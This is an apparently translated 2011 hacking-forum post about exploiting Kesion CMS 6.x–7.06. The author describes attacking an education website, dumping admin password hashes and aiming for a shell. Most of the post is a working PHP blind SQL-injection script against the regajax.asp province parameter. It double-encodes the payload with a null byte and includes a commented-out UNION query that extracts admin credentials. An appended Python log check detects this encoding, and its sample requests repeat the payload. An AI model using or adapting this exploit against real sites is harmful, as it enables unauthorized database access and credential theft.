Tech-ex Kesion 6.x - 7.06 continued exploitation - vulnerability warning - the black bar safety net

2011-10-22T00:00:00
ID MYHACK58:62201132110
Type myhack58
Reporter Anonymous
Modified 2011-10-22T00:00:00

Description

Today I was working on an edu site with a fellow hacker. It is a sad reminder for the webmaster: Tech-ex 6.5 was installed some time ago, and now the site simply gets its ass kicked...

An expert on t00ls provided the exploitation method. I dumped the md5 but could not crack it... It is the mssql version of Tech-ex,

so with good luck one could back up a shell or something; I can't just give up. So, following the analysis in an online article, I wrote a piece of php.

Set up php+apache locally, and it can be fed straight into a tool and run.

<?php

/*
// Alternative payload (left commented out): double-URL-encode a UNION query.
$str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";
for ($i=0; $i<=strlen($str); $i++){
    $temp .= "%25".base_convert(ord($str[$i]),10,16);
}
echo $temp."0";
*/

// http://www.xxxx.com/user/reg/regajax.asp?action=getcityoption&province=%2566%2527%2520%256F%2572%2520%2531%253D%2531%25006
// All the information

$id = $_GET['id'];
$url = "http://www.xxxx.com/user/reg/regajax.asp?action=getcityoption&province=";
$param = "f'Or 1=1 and 1=".$id; // ?id=1

// Encode every byte of the parameter as %25 + hex, i.e. percent-encoded twice.
$temp = '';
for ($i = 0; $i < strlen($param); $i++)
{
    $temp .= "%25".base_convert(ord($param[$i]),10,16);
}
$url = $url.$temp."%2500";

//echo $url;
//echo file_get_contents($url);
echo GetSources($url);

function GetSources($Url, $User_Agent='', $Referer_Url='') // fetch a specified page
{
    // $Url: address of the page to fetch
    // $User_Agent: user_agent string to send, such as "baiduspider" or "googlebot"
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $Url);
    curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
    curl_setopt($ch, CURLOPT_REFERER, $Referer_Url);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
    $MySources = curl_exec($ch);
    curl_close($ch);
    return $MySources;
}

?>

Look it over and modify it yourself as needed.

There is one problem here: php's file_get_contents can't get the specific error information of the 505 response, so this is not error-based injection, only blind.
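
On the defender's side, the double percent-encoding that the script above produces (`%25` plus the hex byte, ending in `%2500`) stands out in request logs. The following Python check is an added example, not part of the original post; the request lines, function names and keyword list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

PCT = re.compile(r"%[0-9A-Fa-f]{2}")  # one percent-encoded byte
SQL_META = re.compile(r"'|--|;|\b(?:union|select)\b", re.I)  # assumed keyword list

# Constructed request targets (not taken from the original post).
SAMPLE_REQUESTS = [
    "/user/reg/regajax.asp?action=getcityoption&province=Guangdong",
    "/user/reg/regajax.asp?action=getcityoption&province=%E5%B9%BF%E4%B8%9C",
    "/user/reg/regajax.asp?action=getcityoption&province=%2541",
    "/user/reg/regajax.asp?action=getcityoption&province="
    "%2566%2527%254f%2572%2520%2531%253d%2531%2500",
]


def decode_layers(value, max_rounds=3):
    """Percent-decode until stable; return (text, number of decoding rounds)."""
    rounds = 0
    while rounds < max_rounds and PCT.search(value):
        # latin-1 maps every decoded byte to one character, so %00 stays visible
        value = unquote(value, encoding="latin-1")
        rounds += 1
    return value, rounds


def inspect_request(request_target):
    """Report query parameters that needed two or more decoding rounds."""
    findings = []
    for pair in urlsplit(request_target).query.split("&"):
        name, _, raw = pair.partition("=")
        text, rounds = decode_layers(raw)
        if rounds < 2:
            continue  # plain or singly encoded values are normal traffic
        reasons = ["double-encoded"]
        if "\x00" in text:
            reasons.append("null byte")
        if SQL_META.search(text):
            reasons.append("sql metacharacters")
        findings.append((name, rounds, reasons))
    return findings


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(inspect_request(target), target)
```
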